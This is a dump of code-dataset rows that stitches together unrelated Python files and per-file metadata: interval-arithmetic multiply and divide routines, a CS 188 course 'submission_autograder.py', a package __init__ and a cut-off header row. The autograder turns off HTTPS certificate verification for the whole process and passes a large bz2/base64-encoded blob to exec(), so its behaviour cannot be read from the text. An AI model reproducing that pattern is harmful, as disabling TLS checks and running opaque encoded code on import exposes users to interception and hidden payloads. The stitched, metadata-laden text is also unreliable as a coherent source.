if (s_lo>=0) & (o_hi<=0): # A+ B-
l,h = s_hi * o_lo, s_lo * o_hi
if ((s_lo<0) & (s_hi>0)) & (o_lo>=0): # A0 B+
l,h = s_lo * o_hi, s_hi * o_hi
if ((s_lo<0) & (s_hi>0)) & ((o_lo<0) & (o_hi>0)): # A0 B0
l=numpy.min((s_lo*o_hi, s_hi*o_lo,s_lo*o_lo,s_hi*o_hi),axis=0)
h=numpy.max((s_lo*o_lo, s_hi*o_hi,s_lo*o_hi,s_hi*o_lo),axis=0)
if ((s_lo<0) & (s_hi>0)) & (o_hi<=0): # A0 B-
l,h = s_hi * o_lo, s_lo * o_lo
if (s_hi<=0) & (o_lo>=0): # A- B+
l,h = s_lo * o_hi, s_hi * o_lo
if (s_hi<=0) & ((o_lo<0) & (o_hi>0)): # A- B0
l,h = s_lo * o_hi, s_lo * o_lo
if (s_hi<=0) & (o_hi<=0): # A- B-
l,h = s_hi * o_hi, s_lo * o_lo
elif s_lo.shape==o_lo.shape:
l,h = numpy.empty(s_lo.shape),numpy.empty(s_lo.shape)
pp=(s_lo >= 0) & (o_lo >= 0) # A+ B+
l[pp] = s_lo[pp] * o_lo[pp]
h[pp] = s_hi[pp] * o_hi[pp]
pz=(s_lo>=0) & ((o_lo<0) & (o_hi>0)) # A+ B0
l[pz] = s_hi[pz] * o_lo[pz]
h[pz] = s_hi[pz] * o_hi[pz]
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi[pn] * o_lo[pn]
h[pn] = s_lo[pn] * o_hi[pn]
zp=((s_lo<0) & (s_hi>0)) & (o_lo>=0) # A0 B+
l[zp] = s_lo[zp] * o_hi[zp]
h[zp] = s_hi[zp] * o_hi[zp]
zz=((s_lo<0) & (s_hi>0)) & ((o_lo<0) & (o_hi>0)) # A0 B0
l[zz]=numpy.min((s_lo[zz]*o_hi[zz], s_hi[zz]*o_lo[zz],s_lo[zz]*o_lo[zz],s_hi[zz]*o_hi[zz]),axis=0)
h[zz]=numpy.max((s_lo[zz]*o_lo[zz], s_hi[zz]*o_hi[zz],s_lo[zz]*o_hi[zz],s_hi[zz]*o_lo[zz]),axis=0)
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0)# A0 B-
l[zn] = s_hi[zn] * o_lo[zn]
h[zn] = s_lo[zn] * o_lo[zn]
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo[np] * o_hi[np]
h[np] = s_hi[np] * o_lo[np]
nz=(s_hi<=0) & ((o_lo<0) & (o_hi>0)) # A- B0
l[nz] = s_lo[nz] * o_hi[nz]
h[nz] = s_lo[nz] * o_lo[nz]
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi[nn] * o_hi[nn]
h[nn] = s_lo[nn] * o_lo[nn]
elif s.scalar:
l,h = numpy.empty(o_lo.shape),numpy.empty(o_lo.shape)
pp=(s_lo >= 0) & (o_lo >= 0) # A+ B+
l[pp] = s_lo * o_lo[pp]
h[pp] = s_hi * o_hi[pp]
pz=(s_lo>=0) & ((o_lo<0) & (o_hi>0)) # A+ B0
l[pz] = s_hi * o_lo[pz]
h[pz] = s_hi * o_hi[pz]
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi * o_lo[pn]
h[pn] = s_lo * o_hi[pn]
zp=((s_lo<0) & (s_hi>0)) & (o_lo>=0) # A0 B+
l[zp] = s_lo * o_hi[zp]
h[zp] = s_hi * o_hi[zp]
zz=((s_lo<0) & (s_hi>0)) & ((o_lo<0) & (o_hi>0)) # A0 B0
l[zz]=numpy.min((s_lo*o_hi[zz], s_hi*o_lo[zz],s_lo*o_lo[zz],s_hi*o_hi[zz]),axis=0)
h[zz]=numpy.max((s_lo*o_lo[zz], s_hi*o_hi[zz],s_lo*o_hi[zz],s_hi*o_lo[zz]),axis=0)
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0)# A0 B-
l[zn] = s_hi * o_lo[zn]
h[zn] = s_lo * o_lo[zn]
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo * o_hi[np]
h[np] = s_hi * o_lo[np]
nz=(s_hi<=0) & ((o_lo<0) & (o_hi>0)) # A- B0
l[nz] = s_lo * o_hi[nz]
h[nz] = s_lo * o_lo[nz]
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi * o_hi[nn]
h[nn] = s_lo * o_lo[nn]
elif o.scalar:
l,h = numpy.empty(s_lo.shape),numpy.empty(s_lo.shape)
pp=(s_lo >= 0) & (o_lo >= 0) # A+ B+
l[pp] = s_lo[pp] * o_lo
h[pp] = s_hi[pp] * o_hi
pz=(s_lo>=0) & ((o_lo<0) & (o_hi>0)) # A+ B0
l[pz] = s_hi[pz] * o_lo
h[pz] = s_hi[pz] * o_hi
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi[pn] * o_lo
h[pn] = s_lo[pn] * o_hi
zp=((s_lo<0) & (s_hi>0)) & (o_lo>=0) # A0 B+
l[zp] = s_lo[zp] * o_hi
h[zp] = s_hi[zp] * o_hi
zz=((s_lo<0) & (s_hi>0)) & ((o_lo<0) & (o_hi>0)) # A0 B0
l[zz]=numpy.min((s_lo[zz]*o_hi, s_hi[zz]*o_lo,s_lo[zz]*o_lo,s_hi[zz]*o_hi),axis=0)
h[zz]=numpy.max((s_lo[zz]*o_lo, s_hi[zz]*o_hi,s_lo[zz]*o_hi,s_hi[zz]*o_lo),axis=0)
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0)# A0 B-
l[zn] = s_hi[zn] * o_lo
h[zn] = s_lo[zn] * o_lo
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo[np] * o_hi
h[np] = s_hi[np] * o_lo
nz=(s_hi<=0) & ((o_lo<0) & (o_hi>0)) # A- B0
l[nz] = s_lo[nz] * o_hi
h[nz] = s_lo[nz] * o_lo
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi[nn] * o_hi
h[nn] = s_lo[nn] * o_lo
return l,h
def divide(s,o):
s_lo,s_hi,o_lo,o_hi=s.lo,s.hi,o.lo,o.hi
other_straddle_zero = numpy.any((o_lo.flatten()<=0) & (o_hi.flatten()>=0))
if other_straddle_zero: raise ZeroDivisionError
if s.scalar & o.scalar:
if (s_lo >= 0) & (o_lo > 0): # A+ B+
l,h = s_lo / o_hi, s_hi / o_lo
if ((s_lo<0) & (s_hi>0)) & (o_lo>0): # A0 B+
l,h = s_lo / o_lo, s_hi / o_lo
if (s_hi<=0) & (o_lo>=0): # A- B+
l,h = s_lo / o_lo, s_hi / o_hi
if (s_lo>=0) & (o_hi<=0): # A+ B-
l,h = s_hi / o_hi, s_lo / o_lo
if ((s_lo<0) & (s_hi>0)) & (o_hi<=0): # A0 B-
l,h = s_hi / o_hi, s_lo / o_hi
if (s_hi<=0) & (o_hi<=0): # A- B-
l,h = s_hi / o_lo, s_lo / o_hi
elif s_lo.shape==o_lo.shape:
l,h = numpy.empty(s_lo.shape),numpy.empty(s_lo.shape)
pp=(s_lo >= 0) & (o_lo > 0) # A+ B+
l[pp] = s_lo[pp] / o_hi[pp]
h[pp] = s_hi[pp] / o_lo[pp]
zp=((s_lo<0) & (s_hi>0)) & (o_lo>0) # A0 B+
l[zp] = s_lo[zp] / o_lo[zp]
h[zp] = s_hi[zp] / o_lo[zp]
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo[np] / o_lo[np]
h[np] = s_hi[np] / o_hi[np]
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi[pn] / o_hi[pn]
h[pn] = s_lo[pn] / o_lo[pn]
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0) # A0 B-
l[zn] = s_hi[zn] / o_hi[zn]
h[zn] = s_lo[zn] / o_hi[zn]
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi[nn] / o_lo[nn]
h[nn] = s_lo[nn] / o_hi[nn]
elif s.scalar:
l,h = numpy.empty(o_lo.shape),numpy.empty(o_lo.shape)
pp=(s_lo >= 0) & (o_lo > 0) # A+ B+
l[pp] = s_lo / o_hi[pp]
h[pp] = s_hi / o_lo[pp]
zp=((s_lo<0) & (s_hi>0)) & (o_lo>0) # A0 B+
l[zp] = s_lo / o_lo[zp]
h[zp] = s_hi / o_lo[zp]
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo / o_lo[np]
h[np] = s_hi / o_hi[np]
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi / o_hi[pn]
h[pn] = s_lo / o_lo[pn]
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0) # A0 B-
l[zn] = s_hi / o_hi[zn]
h[zn] = s_lo / o_hi[zn]
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi / o_lo[nn]
h[nn] = s_lo / o_hi[nn]
elif o.scalar:
l,h = numpy.empty(s_lo.shape),numpy.empty(s_lo.shape)
pp=(s_lo >= 0) & (o_lo > 0) # A+ B+
l[pp] = s_lo[pp] / o_hi
h[pp] = s_hi[pp] / o_lo
zp=((s_lo<0) & (s_hi>0)) & (o_lo>0) # A0 B+
l[zp] = s_lo[zp] / o_lo
h[zp] = s_hi[zp] / o_lo
np=(s_hi<=0) & (o_lo>=0) # A- B+
l[np] = s_lo[np] / o_lo
h[np] = s_hi[np] / o_hi
pn=(s_lo>=0) & (o_hi<=0) # A+ B-
l[pn] = s_hi[pn] / o_hi
h[pn] = s_lo[pn] / o_lo
zn=((s_lo<0) & (s_hi>0)) & (o_hi<=0) # A0 B-
l[zn] = s_hi[zn] / o_hi
h[zn] = s_lo[zn] / o_hi
nn=(s_hi<=0) & (o_hi<=0) # A- B-
l[nn] = s_hi[nn] / o_lo
h[nn] = s_lo[nn] / o_hi
return l,h | 40.07 | 106 | 0.436486 | 1,784 | 8,014 | 1.697309 | 0.029148 | 0.124835 | 0.05284 | 0.06605 | 0.932299 | 0.930317 | 0.924373 | 0.781044 | 0.76354 | 0.761559 | 0 | 0.036478 | 0.322685 | 8,014 | 200 | 107 | 40.07 | 0.521371 | 0.060644 | 0 | 0.375661 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.010582 | false | 0 | 0.005291 | 0 | 0.026455 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
34bc6c4dba7e989123fef78a757eafb7c38f1d3b | 9,021 | py | Python | PJ1_search/submission_autograder.py | Pupei146/CS188-Homework | 6712da1b27907f4096752c379c342481927000c8 | [
"Apache-2.0"
] | 43 | 2019-10-31T10:21:14.000Z | 2022-03-31T14:55:01.000Z | PJ1_search/submission_autograder.py | Pupei146/CS188-Homework | 6712da1b27907f4096752c379c342481927000c8 | [
"Apache-2.0"
] | null | null | null | PJ1_search/submission_autograder.py | Pupei146/CS188-Homework | 6712da1b27907f4096752c379c342481927000c8 | [
"Apache-2.0"
] | 27 | 2020-03-27T00:13:11.000Z | 2022-03-27T01:51:15.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
from codecs import open
import os, ssl
if (not os.environ.get('PYTHONHTTPSVERIFY', '') and getattr(ssl, '_create_unverified_context', None)):
ssl._create_default_https_context = ssl._create_unverified_context
"""
CS 188 Local Submission Autograder
Written by the CS 188 Staff
==============================================================================
_____ _ _
/ ____| | | |
| (___ | |_ ___ _ __ | |
\___ \| __/ _ \| '_ \| |
____) | || (_) | |_) |_|
|_____/ \__\___/| .__/(_)
| |
|_|
Modifying or tampering with this file is a violation of course policy.
If you're having trouble running the autograder, please contact the staff.
==============================================================================
"""
import bz2, base64
exec(bz2.decompress(base64.b64decode(
'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')))
| 273.363636 | 8,069 | 0.927281 | 259 | 9,021 | 32.050193 | 0.911197 | 0.003253 | 0.004578 | 0.006264 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.132917 | 0.02339 | 9,021 | 32 | 8,070 | 281.90625 | 0.809308 | 0.004656 | 0 | 0 | 0 | 0.125 | 0.965891 | 0.963864 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0.125 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
34ea19d3f439741537d34166355f3fd921b3f3a4 | 116 | py | Python | reusable_components/__init__.py | TahiriNadia/dash-docs | 630bdb71922f736d32268732ca1c0b2e87b6c11c | [
"MIT"
] | null | null | null | reusable_components/__init__.py | TahiriNadia/dash-docs | 630bdb71922f736d32268732ca1c0b2e87b6c11c | [
"MIT"
] | null | null | null | reusable_components/__init__.py | TahiriNadia/dash-docs | 630bdb71922f736d32268732ca1c0b2e87b6c11c | [
"MIT"
] | null | null | null | from .Column import Column # noqa: F401
from .Header import Header # noqa: F401
from .Row import Row # noqa: F401 | 38.666667 | 40 | 0.724138 | 18 | 116 | 4.666667 | 0.388889 | 0.285714 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.096774 | 0.198276 | 116 | 3 | 41 | 38.666667 | 0.806452 | 0.275862 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
34f904bcbaa7d7b07c045446372a3a4ccb67d3c0 | 4,951 | py | Python | antiphishme/src/api/verification.py | TheArqsz/AntiPhishMe-backend | 3ae38059e410152ae1976815c209829ac08f47a5 | [
"MIT"
] | 1 | 2020-05-28T11:45:22.000Z | 2020-05-28T11:45:22.000Z | antiphishme/src/api/verification.py | TheArqsz/AntiPhishMe-backend | 3ae38059e410152ae1976815c209829ac08f47a5 | [
"MIT"
